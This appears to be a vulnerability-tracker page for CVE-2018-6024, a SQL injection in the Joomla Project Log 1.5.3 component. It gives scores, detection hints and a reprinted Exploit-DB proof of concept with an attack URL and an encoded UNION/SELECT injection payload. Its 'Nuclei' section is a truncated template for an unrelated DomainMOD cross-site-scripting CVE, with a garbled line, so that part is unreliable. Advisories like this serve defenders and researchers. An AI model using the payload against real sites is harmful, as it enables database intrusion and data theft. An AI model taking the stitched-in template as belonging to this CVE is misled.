CVE-2018-6024
published 2018-02-18CVE-2018-6024: SQL Injection exists in the Project Log 1.5.3 component for Joomla! via the search parameter.
PriorityP263critical9.8CVSS 3.0
AVNACLPRNUINSUCHIHAH
EXPLOIT
EPSS
3.11%
86.1th percentile
SQL Injection exists in the Project Log 1.5.3 component for Joomla! via the search parameter.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| thethinkery | project_log | — | — |
Detection & IOCsextracted from sources · hover to see the quote
- →Monitor HTTP requests targeting the Joomla component parameter `option=com_projectlog` combined with a `search` parameter containing SQL injection payloads (e.g., quotes, UNION/SELECT keywords, or encoded equivalents). ↗
- →SQL Injection is delivered via the `search` GET parameter in the Project Log 1.5.3 Joomla component; inspect and alert on unsanitised input to this parameter. ↗
- ·The exploit PoC URL uses `localhost` as a placeholder; the actual attack path depends on the Joomla installation root (`[PATH]`), so detection rules should match on the query-string parameters rather than the host/path. ↗
CVSS provenance
nvdv3.09.8CRITICALCVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
nvdv2.07.5HIGHAV:N/AC:L/Au:N/C:P/I:P/A:P
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
Joomla! Component Project Log 1.5.3 - 'search' SQL Injection
exploitdb·2018-02-16·CVSS 9.8
CVE-2018-6024 [CRITICAL] Joomla! Component Project Log 1.5.3 - 'search' SQL Injection
Joomla! Component Project Log 1.5.3 - 'search' SQL Injection
---
# # # #
# Exploit Title: Joomla! Component Project Log 1.5.3 - SQL Injection
# Dork: N/A
# Date: 16.02.2018
# Vendor Homepage: https://extensions.thethinkery.net/
# Software Link: https://extensions.joomla.org/extensions/extension/clients-a-communities/project-a-task-management/project-log/
# Version: 1.5.3
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: CVE-2018-6024
# # # #
# Exploit Author: Ihsan Sencan
# # # #
#
# POC:
#
# 1)
# http://localhost/[PATH]/index.php?option=com_projectlog&view=cat&search=[SQL]
#
# JTJkJTYxJTI3JTIwJTIwJTJmJTJhJTIxJTMxJTMzJTMzJTMzJTM3JTU1JTRlJTQ5JTRmJTRlJTJhJTJmJTIwJTJmJTJhJTIxJTMxJTMzJTMzJTMzJTM3JTUzJTQ1JTRjJTQ1JTQzJTU0JTJhJTJmJTIwJTMxJTJjJTMyJTJjJTMzJTJjJTI4JTUzJTQ1JTRjJTQ1JTQz
Nuclei
DomainMOD <=4.11.01 - Cross-Site Scripting
nuclei·CVSS 4.8
CVE-2018-19915 [MEDIUM] DomainMOD <=4.11.01 - Cross-Site Scripting
DomainMOD =4.11.02) to mitigate this vulnerability.
reference:
- https://github.com/domainmod/domainmod/issues/87
- https://www.exploit-db.com/exploits/46376/
- https://nvd.nist.gov/vuln/detail/CVE-2018-19915
- https://github.com/ARPSyndicate/cvemon
- https://github.com/ARPSyndicate/kenzer-templates
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N
cvss-score: 4.8
cve-id: CVE-2018-19915
cwe-id: CWE-79
epss-score: 0.00392
epss-percentile: 0.6024
cpe: cpe:2.3:a:domainmod:domainmod:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 3
vendor: domainmod
product: domainmod
tags: cve,cve2018,domainmod,xss,authenticated,edb,vuln
http:
- raw:
- |
POST / HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
new_username={{username}}&new_password={{
2018-02-18
Published